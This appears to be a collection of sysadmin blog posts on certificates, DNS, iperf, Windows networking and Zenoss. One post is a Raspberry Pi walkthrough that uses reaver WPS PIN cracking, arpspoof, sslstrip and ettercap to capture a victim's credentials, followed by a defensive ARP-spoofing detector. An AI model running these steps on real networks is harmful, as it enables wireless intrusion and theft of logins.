Create a strong self-signed certificate for multiple years

If you follow these steps you can create a self-signed certificate with the following specifications:

  • Wildcard certificate (*.domain.local; note that a wildcard does not match the bare name domain.local)
  • SHA-256 signature hash
  • 10 years validity
  • 2048-bit RSA public key
  • Client and server authentication (both Enhanced Key Usages)
  • SHA-1 thumbprint (the identifier Windows uses for the certificate; this is not the signature hash)

Be aware that a self-signed certificate is not chained to any trusted CA: a client that is told to accept it cannot tell it apart from one an attacker generated for a man-in-the-middle, unless that exact certificate is pinned or installed as trusted on the client. Do not use this in critical production environments; get a certificate from an internal or public CA instead.

Run the commands below in an elevated (Run as administrator) Windows 10 PowerShell. Without admin rights, writing to the LocalMachine store fails with an access-denied error.

$cert = New-SelfSignedCertificate -CertStoreLocation Cert:\LocalMachine\My -DnsName "*.domain.local" -KeyAlgorithm RSA -KeyLength 2048 -HashAlgorithm SHA256 -KeyExportPolicy Exportable -NotBefore ([datetime]::Now.AddDays(-15)) -NotAfter ([datetime]::Now.AddDays(3650))
$cert.Thumbprint

The key, hash and export settings are spelled out so the result matches the specification above on any Windows 10 build, and 3650 days gives the 10 years (the start date is backdated 15 days).

Now export the certificate with its private key (PFX, for the server) and the public certificate alone (CER, for the clients). $cert still refers to the certificate created above; in a new session use the store path with the thumbprint instead, e.g. Cert:\LocalMachine\My\C6B46CEB7D3A40DB08E78B19FEDD3A24EA7A7919. Type -AsPlainText with a plain hyphen: copy/paste from a web page often turns it into an en dash, which PowerShell rejects as an unknown parameter.

$CertPassword = ConvertTo-SecureString -String "YourPassword" -Force -AsPlainText
Export-PfxCertificate -Cert $cert -FilePath C:\test.pfx -Password $CertPassword
Export-Certificate -Cert $cert -FilePath C:\tstcert.cer

Now you can import the PFX on the web server and bind the certificate to the site in IIS.
Import the .CER on every client that must trust it: MMC > Certificates > Computer account > Trusted Root Certification Authorities > Certificates. Every machine that trusts it will accept this certificate for any host name under *.domain.local, so treat test.pfx and its password like a CA key: keep them off shared drives and delete the PFX once it has been imported.
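The man-in-the-middle caveat above has a practical answer for the few clients that must talk to this server: pin the thumbprint you just exported instead of (or in addition to) trusting the certificate system-wide. The following Python script is an added example and not part of the original post. It fetches the leaf certificate from a host, computes the thumbprint the way Windows does (a hash over the DER encoding of the certificate) and compares it with a pinned value in any of the spellings MMC, PowerShell or openssl print. The host name, port and the EXPECTED_SHA1 value are assumptions.

```python
"""Verify a TLS endpoint against a pinned certificate thumbprint.

Added example, not code from the original post. Assumes a host that presents
the self-signed certificate created above; EXPECTED_SHA1 is the thumbprint
New-SelfSignedCertificate printed (a hypothetical value is used here).
"""
import hashlib
import re
import socket
import ssl
import sys

# Hypothetical thumbprint, written the way MMC displays it (spaced, upper-case).
EXPECTED_SHA1 = "C6 B4 6C EB 7D 3A 40 DB 08 E7 8B 19 FE DD 3A 24 EA 7A 79 19"


def normalize_pin(pin: str) -> str:
    """Strip spaces and colons and upper-case, so the MMC, PowerShell and
    openssl renderings of the same thumbprint compare equal."""
    cleaned = re.sub(r"[\s:]", "", pin).upper()
    if not re.fullmatch(r"[0-9A-F]+", cleaned):
        raise ValueError(f"not a hex thumbprint: {pin!r}")
    return cleaned


def thumbprint(der: bytes, algo: str = "sha1") -> str:
    """A Windows 'thumbprint' is the hash over the DER-encoded certificate.
    SHA-1 is what the certificate store shows; pin SHA-256 for anything new,
    the pin identifies the whole certificate, not just the key."""
    return hashlib.new(algo, der).hexdigest().upper()


def matches_pin(der: bytes, pin: str, algo: str = "sha1") -> bool:
    """Constant-format comparison of the live certificate against the pin."""
    return thumbprint(der, algo) == normalize_pin(pin)


def fetch_der(host: str, port: int = 443, timeout: float = 5.0) -> bytes:
    """Fetch the leaf certificate without chain validation. Validation is
    deliberately off because the certificate is self-signed; the pin check
    in matches_pin() is what stands in for CA trust."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True)


def check_host(host: str, port: int, pin: str, algo: str = "sha1") -> bool:
    """True when the certificate the host presents matches the pin."""
    return matches_pin(fetch_der(host, port), pin, algo)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "www.domain.local"  # assumed host
    ok = check_host(target, 443, EXPECTED_SHA1)
    print("pin OK" if ok else "PIN MISMATCH: possible interception or a renewed certificate")
    sys.exit(0 if ok else 1)
```

A mismatch means either interception or that the server's certificate was replaced, so a pinned client needs a way to roll the pin when you renew the certificate in 10 years.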

Have fun with your certificate the next 10 years 😀


Convert PFX to PEM and upload the certificate to Plesk

Export the Private Key:

# openssl pkcs12 -in filename.pfx -nocerts -out key.pem

Remove the passphrase from the private key (Plesk needs the key unencrypted):

# openssl rsa -in key.pem -out server.key

server.key is now a plaintext private key: make it readable by you only (chmod 600 server.key) and delete both key files from the workstation once the certificate has been uploaded.

Export the certificate:

# openssl pkcs12 -in filename.pfx -clcerts -nokeys -out cert.pem

Now upload server.key and cert.pem as a new certificate on the SSL certificates page in Plesk, and then select that certificate in the hosting settings of the domain.

Find your fastest DNS server

namebench is a cross-platform open source tool that measures which DNS resolver answers fastest from your internet connection.

  1. Go to https://code.google.com/p/namebench/downloads/list
  2. Download the namebench tool
  3. Extract and start the tool
  4. Click on "Start Benchmark"


The benchmark takes about 15 minutes. The results then open in your browser:


201% faster name query performance!!! WOW!

Once you have changed your DNS settings, you can check which resolver your system really uses (and whether queries leak to another one) at https://www.dnsleaktest.com/


Because resolver load varies, run the benchmark at different times of the day before settling on one. Speed should not be the only criterion: the resolver you pick sees every name you look up, and plain DNS is unauthenticated, so choose an operator you trust.
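What namebench does under the hood is send the same queries to each candidate resolver and time the replies. The script below is an added example (my own code, not namebench's) that does the same with raw UDP DNS in plain Python: it builds an A query, times the answer from each resolver and parses the reply. The resolver and name lists are assumptions; swap in your own. Checking that a reply carries the transaction ID you sent matters because plain DNS is unauthenticated: a late or spoofed reply would otherwise be timed and believed.

```python
"""Raw-UDP DNS latency benchmark (added example; not namebench's code).

Sends an A query to each candidate resolver and times the reply, which is
the core of what namebench measures. RESOLVERS and NAMES are assumptions;
replace them with your own candidates and a workload you actually use."""
import random
import socket
import struct
import time
from typing import Dict, List, Optional, Tuple

RESOLVERS = ["192.168.1.1", "8.8.8.8", "1.1.1.1"]       # assumed candidates
NAMES = ["example.com", "wikipedia.org", "github.com"]  # assumed workload


def build_query(name: str, txid: int) -> bytes:
    """Standard query, recursion desired, one question of type A, class IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)


def _read_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Walk labels, following compression pointers (RFC 1035 section 4.1.4).
    Returns (name, offset just past the name as it appeared at 'off')."""
    labels, end, hops = [], None, 0
    while True:
        n = msg[off]
        if n & 0xC0 == 0xC0:                       # 2-byte pointer
            if end is None:
                end = off + 2
            off = ((n & 0x3F) << 8) | msg[off + 1]
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if n == 0:
            break
        labels.append(msg[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), (off if end is None else end)


def parse_answer(msg: bytes, txid: int) -> Tuple[int, List[str]]:
    """Return (rcode, A records). Rejects replies whose ID is not ours:
    plain DNS is unauthenticated, so a stale or spoofed reply must not be
    timed or believed."""
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if rid != txid:
        raise ValueError("transaction id mismatch")
    off = 12
    for _ in range(qd):
        _, off = _read_name(msg, off)
        off += 4                                   # QTYPE + QCLASS
    addrs = []
    for _ in range(an):
        _, off = _read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(".".join(str(b) for b in msg[off:off + 4]))
        off += rdlen
    return flags & 0x0F, addrs


def time_query(server: str, name: str, timeout: float = 2.0) -> Optional[float]:
    """Milliseconds until a valid reply, or None on timeout."""
    txid = random.randrange(1 << 16)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        t0 = time.perf_counter()
        s.sendto(build_query(name, txid), (server, 53))
        try:
            data, _ = s.recvfrom(512)
        except socket.timeout:
            return None
        parse_answer(data, txid)
    return (time.perf_counter() - t0) * 1000.0


def benchmark(resolvers, names, rounds: int = 3) -> Dict[str, Tuple[Optional[float], int]]:
    """Per resolver: (mean latency in ms or None, number of timeouts)."""
    results = {}
    for r in resolvers:
        samples = [time_query(r, n) for _ in range(rounds) for n in names]
        ok = [s for s in samples if s is not None]
        results[r] = (sum(ok) / len(ok) if ok else None, len(samples) - len(ok))
    return results


if __name__ == "__main__":
    ranked = sorted(benchmark(RESOLVERS, NAMES).items(),
                    key=lambda kv: (kv[1][0] is None, kv[1][0] or 0.0))
    for server, (avg, lost) in ranked:
        shown = "timeout" if avg is None else f"{avg:7.1f} ms"
        print(f"{server:16} {shown}  timeouts={lost}")
```

The first round against each resolver is usually a cache miss and later rounds cache hits, which is why the rounds are averaged; run it at several times of day, as the post says, before trusting the ranking.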

Happy resolving 🙂

Build your own speedtest with iperf

When you have network performance issues you often use speed-test websites to check your bandwidth, but most of the time you want to measure the bandwidth between two specific servers. iperf is a cross-platform tool for exactly that.

How it works:

  • Download the tool: http://iperf.fr/
  • Extract the tool into a folder and open a command line in that folder
  • Start the tool on the server with: iperf -s


  • Start the tool on the remote client: iperf -c IPSERVER -r
  • With -r the tool first measures client to server and then, in a separate run, server to client


If you have connection problems with iperf, temporarily turn off the firewall on both server and client, or open just the iperf port (5001/tcp by default). You can also play with different TCP window sizes: iperf -c IPSERVER -r -w 40000. Stop iperf -s when you are done: the listener has no authentication, so anyone who can reach it can use your server to fill its uplink.
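To see what iperf actually measures, here is an added example (my own code, not iperf's) that does the same thing in Python: a receiver counts bytes and seconds, a sender pushes a fixed amount of data, and the -w option is mirrored by setting the socket buffer sizes, which bound how much data can be in flight. Port 5001 is iperf2's default listening port; the loopback test runs both sides on one machine so it can be tried without a second host.

```python
"""Minimal TCP throughput test in the spirit of iperf (added example; this
is not iperf's code). One side listens, the other pushes a fixed number of
bytes, and the receiver reports the rate it actually got. 'window' mirrors
iperf's -w: it sets the socket buffers, which bound the data in flight."""
import socket
import threading
import time
from typing import Optional, Tuple

CHUNK = 64 * 1024
DEFAULT_PORT = 5001          # iperf2's default listening port


def mbps(nbytes: int, seconds: float) -> float:
    """Megabits per second, as iperf reports it (decimal mega)."""
    return float("inf") if seconds <= 0 else nbytes * 8 / seconds / 1e6


def serve_once(port: int = DEFAULT_PORT, window: Optional[int] = None,
               ready: Optional[threading.Event] = None,
               bound: Optional[list] = None) -> Tuple[int, float]:
    """Accept one sender, drain it, return (bytes received, seconds).
    Binds to localhost only: an open iperf-style listener is an
    unauthenticated service anyone can use to saturate your link."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        if window:
            srv.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, window)
        srv.bind(("127.0.0.1", port))
        srv.listen(1)
        if bound is not None:
            bound.append(srv.getsockname()[1])   # real port when port=0
        if ready is not None:
            ready.set()
        conn, _ = srv.accept()
        with conn:
            total, t0 = 0, time.perf_counter()
            while True:
                data = conn.recv(CHUNK)
                if not data:                      # sender did shutdown(SHUT_WR)
                    break
                total += len(data)
            return total, time.perf_counter() - t0


def send_bytes(host: str, port: int, nbytes: int,
               window: Optional[int] = None) -> float:
    """Push nbytes of filler to the receiver; return elapsed seconds."""
    filler = b"\x00" * CHUNK
    with socket.create_connection((host, port)) as c:
        if window:
            c.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, window)
        t0 = time.perf_counter()
        sent = 0
        while sent < nbytes:
            n = min(CHUNK, nbytes - sent)
            c.sendall(filler[:n])
            sent += n
        c.shutdown(socket.SHUT_WR)                # tell the receiver we are done
        return time.perf_counter() - t0


def local_test(nbytes: int = 8 * 1024 * 1024,
               window: Optional[int] = None) -> Tuple[int, float]:
    """Run receiver and sender against each other over loopback;
    return (bytes received, Mbit/s as seen by the receiver)."""
    ready, bound, result = threading.Event(), [], {}

    def server():
        result["r"] = serve_once(0, window, ready, bound)

    th = threading.Thread(target=server, daemon=True)
    th.start()
    if not ready.wait(5):
        raise RuntimeError("receiver did not start")
    send_bytes("127.0.0.1", bound[0], nbytes, window)
    th.join(60)
    received, secs = result["r"]
    return received, mbps(received, secs)


if __name__ == "__main__":
    for w in (None, 40000):                      # like iperf -w 40000
        got, rate = local_test(window=w)
        print(f"window={w or 'default'}: {got} bytes at {rate:.0f} Mbit/s")
```

Over loopback the numbers are meaningless as bandwidth, but running it with a small window and then the default shows why iperf's -w matters on a real link: with a 40000-byte buffer the sender stalls every time that much data is unacknowledged, so throughput is capped at roughly window size divided by round-trip time.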

For a lot of tips and tricks (even a graphical interface called jperf) check: http://openmaniak.com/iperf.php

Happy troubleshooting 😀

Windows 2012 R2 unstable internet connection

I had two HP DL380 G6 servers with Windows 2012 R2 with the same problem. When I start a download (I tried a lot of different sites) the download drops and fluctuates. When I connect my laptop or another server to the same cable the download is stable. So my conclusion was the onboard NIC.

What I tried:

  • Update to the latest HP SSP (2014_2)
  • Update the NIC firmware
  • Update the NIC driver
  • Update Windows (patches)
  • Change all the default NIC settings, for example disable TCP offload
  • Try another switch

Bandwidth during download:


I thought the problem must be the NIC, so I added an Intel PRO card to the server, with the same result 🙁

Then I found the command netsh interface tcp show global.

Output:

C:\Windows\system32>netsh interface tcp show global
Querying active state...

TCP Global Parameters
----------------------------------------------
Receive-Side Scaling State          : enabled
Chimney Offload State               : disabled
NetDMA State                        : disabled
Direct Cache Access (DCA)           : disabled
Receive Window Auto-Tuning Level    : enabled
Add-On Congestion Control Provider  : none
ECN Capability                      : enabled
RFC 1323 Timestamps                 : disabled
Initial RTO                         : 3000
Receive Segment Coalescing State    : enabled
Non Sack Rtt Resiliency             : disabled
Max SYN Retransmissions             : 2

I dug into these settings and found "Receive Window Auto-Tuning Level: enabled". So I disabled that setting with:

netsh int tcp set global autotuninglevel=disabled

After that setting the network connection to the internet was stable 🙂

Note: with auto-tuning disabled, Windows stops using TCP window scaling and keeps the receive window at its 64 KB default. That is why a firewall that cannot track scaled windows stops dropping segments, but it also caps the throughput of every single connection on high-latency links (at most 64 KB per round trip), so apply it only where that trade-off is acceptable.


I found an article on the net saying that Cisco PIX IOS 8.0 doesn't support "TCP Window Scaling". Source: http://www.cisco.com/c/en/us/support/docs/security/ios-firewall/71613-iosfw-tcp-scaling-ts.html

So I used the workaround of disabling automatic window scaling in Windows, because I can't update our old PIX.

Problem solved 😀

 

Zenoss: Performance issues with too many events

When you have too many events in your Zenoss environment the Zenoss web interface becomes very slooooow and you get all kinds of errors:

  • Script doesn't respond
  • Connection refused. Check zeneventserver status on daemons
  • A Zenoss error has occurred

When you run top you see a lot of Java processes after clicking the Infrastructure button in Zenoss. Java sometimes takes 350% CPU:

java -Djetty.host=localhost -server -XX:+HeapDumpOnOutOfMemoryError -DZENOSS_COMMAND=zeneventserver -DZENHOME=/opt/zenoss -Djetty.home=/opt/zenoss -Djetty.logs=/opt/zenoss/log -Dlogback.configurationFile=/opt/zenoss/etc/zeneventserver/logback.xml -Xmx1024m -DZENOSS_DAEMON=y -jar /opt/zenoss/lib/jetty-start-7.5.3.v20111011.jar --config=/opt/zenoss/etc/zeneventserver/jetty/start.config --ini=/opt/zenoss/etc/zeneventserver/jetty/jetty.ini --pre=etc/zeneventserver/jetty/jetty-logging.xml

I've read a lot of Zenoss documentation on the internet but didn't find a good article on how to get rid of all the events. So here is an article on how I fixed it.

Basic steps:

  1. Backup Zenoss
  2. Stop zenoss
  3. Create a new zeneventserver database
  4. Remove zeneventserver content
  5. Restore the zenoss backup
  6. Start zenoss
  7. Enjoy your fast Zenoss 🙂

Detailed steps:

  • SSH to the Zenoss host
  • Switch to the zenoss user (as a login shell, so $ZENHOME and the rest of the Zenoss environment are set)

# su - zenoss

  • Create backup:

$ /opt/zenoss/bin/zenbackup -v10

  • Stop Zenoss service

$ zenoss stop

  • Edit the zeneventserver database creation script

nano /opt/zenoss/bin/zeneventserver-create-db

  • Search for root and fill in the MySQL root password (remove it from the script again once the next step has run; a root password in a script under /opt/zenoss/bin is readable by anyone with access to that directory)

  • Run the script

$ zeneventserver-create-db --force --dbtype=mysql

  • Clear the zeneventserver folder

rm -rf $ZENHOME/var/zeneventserver/*

Now the tricky part. Zenoss changes some MySQL passwords during a restore, which results in "access denied for user zenoss@localhost" while restoring. The fix is to reset the passwords of 'zenoss'@'localhost' and 'zenoss'@'%' in MySQL before you run the restore.

First get the current MySQL password of the zenoss user from global.conf (the *-password entries for the ZODB and ZEP databases). This is the password you need for the restore.

$ nano /opt/zenoss/etc/global.conf

Tip: to see the stored password hashes (MySQL stores a hash, not an encrypted password), query mysql.user. Do the same after the change to confirm the hash is different:

$ mysql -uroot -p
mysql> select * from mysql.user;


Now reset the password

SET PASSWORD FOR 'zenoss'@'localhost' = PASSWORD('BEagPxxxxxxxxxxxxxxx');
SET PASSWORD FOR 'zenoss'@'%' = PASSWORD('BEagPxxxxxxxxxxxxxxx');

When you query mysql.user again you will see a different hash for the two zenoss entries:

$ mysql -uroot -p
mysql> select * from mysql.user;

(I don't have a screenshot of this because it is a production environment.)

Optional: to check the zenoss user's database privileges:

mysql> SELECT user, host, db, select_priv, insert_priv, grant_priv FROM mysql.db;


Optional: if you still get errors or the privileges above are wrong, create the users and grant the rights with these statements, one set for connections from localhost and one for remote hosts. Use the password from global.conf as 'some_pass'. GRANT ALL PRIVILEGES ON *.* WITH GRANT OPTION is far more than Zenoss needs; on a MySQL server shared with other applications restrict the grant to the Zenoss databases.

mysql> CREATE USER 'zenoss'@'localhost' IDENTIFIED BY 'some_pass';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'zenoss'@'localhost'
    -> WITH GRANT OPTION;

mysql> CREATE USER 'zenoss'@'%' IDENTIFIED BY 'some_pass';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'zenoss'@'%'
    -> WITH GRANT OPTION;

OK, now that everything is set, run the restore. -v stands for verbose, and --no-eventsdb skips restoring the events database, which is exactly what we want:

zenrestore --file=/opt/zenoss/backups/zenbackup_2014013 -v --no-eventsdb

Now start zenoss

$ zenoss start

That's it. Enjoy the performance, and configure event aging and archiving so that the events database does not grow this large again.

Source: http://www.nickyeates.com/technology/zenoss/useful_commands_zenoss4
Source: http://community.zenoss.org/docs/DOC-3048

My Raspberry Pi Project: Hack box

Finally I found a nice project for my Raspberry Pi 🙂 I'll write down some notes in this post so the Linux commands are easier to find back. Use this documentation only as a white hat, on networks you own or are authorised to test, and for learning purposes only!

Step 1: recover the PSK of an access point that has WPS enabled. reaver brute-forces the 8-digit WPS PIN, which the access point answers with the WPA passphrase; a design flaw in WPS lets the PIN be guessed in two halves, so this takes hours rather than years.

  • airmon-ng start wlan0
  • Find the BSSID and channel of the target access point (for example with airodump-ng mon0)
  • reaver -i mon0 -b 64:27:37:50:02:77 -c 5 -vv
  • After roughly 10 hours you have the PSK

Now configure the wireless interface with the recovered credentials:

  • airmon-ng stop mon0 (removes the monitor interface again)
  • nano /etc/network/interfaces
  • Original file:
auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet manual
wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
  • New file (wpa-ssid and wpa-psk belong under the single wlan0 stanza; a second "iface wlan0" stanza only confuses ifup):
auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet dhcp
    wpa-ssid "L0g0ff"
    wpa-psk "SomePassword"
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
#iface default inet dhcp
  • The file now holds the PSK in clear text and is world-readable by default, so chmod 600 /etc/network/interfaces
  • Now bring up the wireless card: ifup wlan0

Now that wireless is up, turn the Pi into an IP-forwarding box so it can sit in the middle of the traffic (man-in-the-middle):

  • echo 1 > /proc/sys/net/ipv4/ip_forward (or sysctl -w net.ipv4.ip_forward=1; this enables IPv4 forwarding until the next reboot)
  • iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666

    (redirects all forwarded HTTP traffic to the port sslstrip listens on)

  • sslstrip -l 666 (do not close this terminal)

Now that the proxy is running, ARP-spoof the victim so that it sends its traffic to the Pi instead of to the gateway:

  • arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1 (1.12 is the victim and 1.1 the gateway; do not close this terminal)
  • You can also spoof the entire network with arpspoof -i wlan0 192.168.1.1, but if the Pi cannot handle all the traffic you will DoS your own network.

Everything is set; the sniffing can begin 🙂

  • ettercap -m ettercap.log -Tq -i wlan0 (don't close the terminal)

Now wait for the victim to log in to a website. The username and password are written to ettercap.log, and grep USER ettercap.log lists the captured credentials. This only works for sites that sslstrip can downgrade to plain HTTP: a site that sends HTTP Strict Transport Security, or is on the browser's preloaded HSTS list, is never requested over HTTP by the browser, so nothing is captured there.

What did we learn?

  1. Never log in to a website over plain HTTP
  2. Never log in to a website that shows certificate (HTTPS) errors
  3. Always disable WPS on your router
  4. On company wireless networks always use a DMZ (a segment separated from the internal LAN)
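The arpspoof step above is also the easiest part of the attack to detect from the defender's side, because the gateway's IP suddenly answers from a second MAC address. The following Python script is an added example (not part of the original post and not one of the tools used in it): it parses ARP frames, remembers which MAC claims each IP, and raises an alert when a claim changes or when one MAC answers for both its own address and the gateway's. The sample frames are constructed to mimic the attack; all MAC and IP addresses are assumptions.

```python
"""Detect ARP spoofing from ARP frames (added example; not from the original
post and not one of the tools it uses). The sample frames are constructed to
mimic the arpspoof step above: the real gateway answers first, then the Pi's
MAC claims the gateway's IP. All MACs and IPs are assumptions."""
import socket
import struct
from collections import defaultdict
from typing import Dict, List, Optional

ETH_ARP = 0x0806
GATEWAY_IP = "192.168.1.1"     # assumed gateway, as in the post


def _mac(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


def _ip(s: str) -> bytes:
    return bytes(int(x) for x in s.split("."))


def make_arp(op: int, sha: str, spa: str, tha: str, tpa: str) -> bytes:
    """Build an Ethernet II + ARP frame (used only to construct test input)."""
    dst = _mac(tha) if op == 2 else b"\xff" * 6
    eth = dst + _mac(sha) + struct.pack("!H", ETH_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + _mac(sha) + _ip(spa) + _mac(tha) + _ip(tpa)
    return eth + arp


def parse_arp(frame: bytes) -> Optional[Dict[str, object]]:
    """Return the fields of an IPv4-over-Ethernet ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,                                              # 1 request, 2 reply
        "sha": ":".join(f"{b:02x}" for b in frame[22:28]),
        "spa": ".".join(str(b) for b in frame[28:32]),
        "tha": ":".join(f"{b:02x}" for b in frame[32:38]),
        "tpa": ".".join(str(b) for b in frame[38:42]),
    }


class ArpWatch:
    """Track which MAC claims each IP. arpspoof shows up as (a) an IP whose
    MAC suddenly changes and (b) one MAC answering for both its own IP and
    the gateway's."""

    def __init__(self, protected=(GATEWAY_IP,)):
        self.ip_to_mac: Dict[str, str] = {}
        self.mac_to_ips = defaultdict(set)
        self.protected = set(protected)
        self.alerts: List[str] = []

    def observe(self, arp: Optional[Dict[str, object]]) -> None:
        if arp is None or arp["op"] not in (1, 2) or arp["spa"] == "0.0.0.0":
            return                                          # not ARP, or a DHCP probe
        ip, mac = str(arp["spa"]), str(arp["sha"])
        old = self.ip_to_mac.get(ip)
        if old is not None and old != mac:
            sev = "HIGH" if ip in self.protected else "MEDIUM"
            self.alerts.append(f"{sev}: {ip} moved from {old} to {mac}")
        others = self.mac_to_ips[mac] - {ip}
        if ip in self.protected and others:
            self.alerts.append(f"HIGH: {mac} claims {ip} but also answers for {sorted(others)}")
        self.ip_to_mac[ip] = mac
        self.mac_to_ips[mac].add(ip)


def scan(frames, protected=(GATEWAY_IP,)) -> List[str]:
    """Run the detector over a list of raw frames; return the alerts."""
    w = ArpWatch(protected)
    for f in frames:
        w.observe(parse_arp(f))
    return w.alerts


# Constructed sample: legitimate gateway reply, the Pi's own request, then
# the Pi (de:ad:be:ef:00:50) replying as 192.168.1.1 to the victim .12.
SAMPLE_FRAMES = [
    make_arp(2, "aa:bb:cc:00:00:01", "192.168.1.1", "de:ad:be:ef:00:12", "192.168.1.12"),
    make_arp(1, "de:ad:be:ef:00:50", "192.168.1.50", "00:00:00:00:00:00", "192.168.1.12"),
    make_arp(2, "de:ad:be:ef:00:50", "192.168.1.1", "de:ad:be:ef:00:12", "192.168.1.12"),
]


def live(iface: str = "wlan0") -> None:
    """Linux only, needs root: watch real ARP traffic on the given interface."""
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_ARP))
    s.bind((iface, 0))
    w = ArpWatch()
    while True:
        seen = len(w.alerts)
        w.observe(parse_arp(s.recv(65535)))
        for a in w.alerts[seen:]:
            print(a)


if __name__ == "__main__":
    for alert in scan(SAMPLE_FRAMES):
        print(alert)
```

The detector only sees ARP frames that reach its own interface, so on a switched network it catches spoofing aimed at the monitoring host itself and broadcast gratuitous ARP, not a targeted attack on another client. A static ARP entry for the gateway on the clients, or dynamic ARP inspection on the switch, closes that gap.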

Sources:
http://www.ikwashetniet.blogspot.nl/2012/01/wps-van-handig-hulpmiddel-naar-gapend.html
http://www.hackavision.com/2011/07/sniffing-passwords-over-wifi-connection.html

Stub zone easy explained

The difference between a stub zone and a secondary DNS zone... it all comes down to replication, efficiency and availability.

Think of it like this:
There are two cities, London and Manchester.
London has 100 people, each with a book full of information (so 100 books in total).
You are in Manchester and you want to be able to have access to the information in these “books”.

There are two ways to do this as follows:
a) Another 100 people appear in London, they each make a copy of a book, and they each take their own car in order to drive to Manchester to meet you and give you the books. This causes a traffic jam due to the high number of people driving on the highway.

The above is secondary zone replication: the whole zone is copied (by zone transfer) to the secondary server.

b) Instead of the above, you are given the addresses of the 100 people in London. When you need information from one of the books, you take your car, drive to that address, find what you need, and drive back to Manchester.

This is a stub zone: it holds only the records that identify the zone's authoritative servers (SOA, NS and their glue A records), and every lookup is sent to those servers.

So think about it for a second.
In example A, the information is stored twice, both in London and Manchester, but the information requires a big highway to transport those 100 people, each in their individual cars, to your office in Manchester. Do you have a big enough highway to support this many people?
In example B, you don’t need such a big highway because a massive number of people are not clogging the highway, each trying to bring a book to you, but instead you decide to go back to London to find the book you need.

So what do we gather from this?
In example A, you need a large highway (lots of bandwidth) to get the books from London to Manchester. But once the information is in Manchester, you can very quickly find the book you need.
In example B, you don’t need a large highway to find the book in London, but you do need a RELIABLE highway. If this highway is closed, how do you get the book? And remember, since the books are not in Manchester, it will take longer for you to get the book (since you need to drive back and forth for it).

Hope this helps; it was the first thing that came to my mind.

Thanks to Shinigami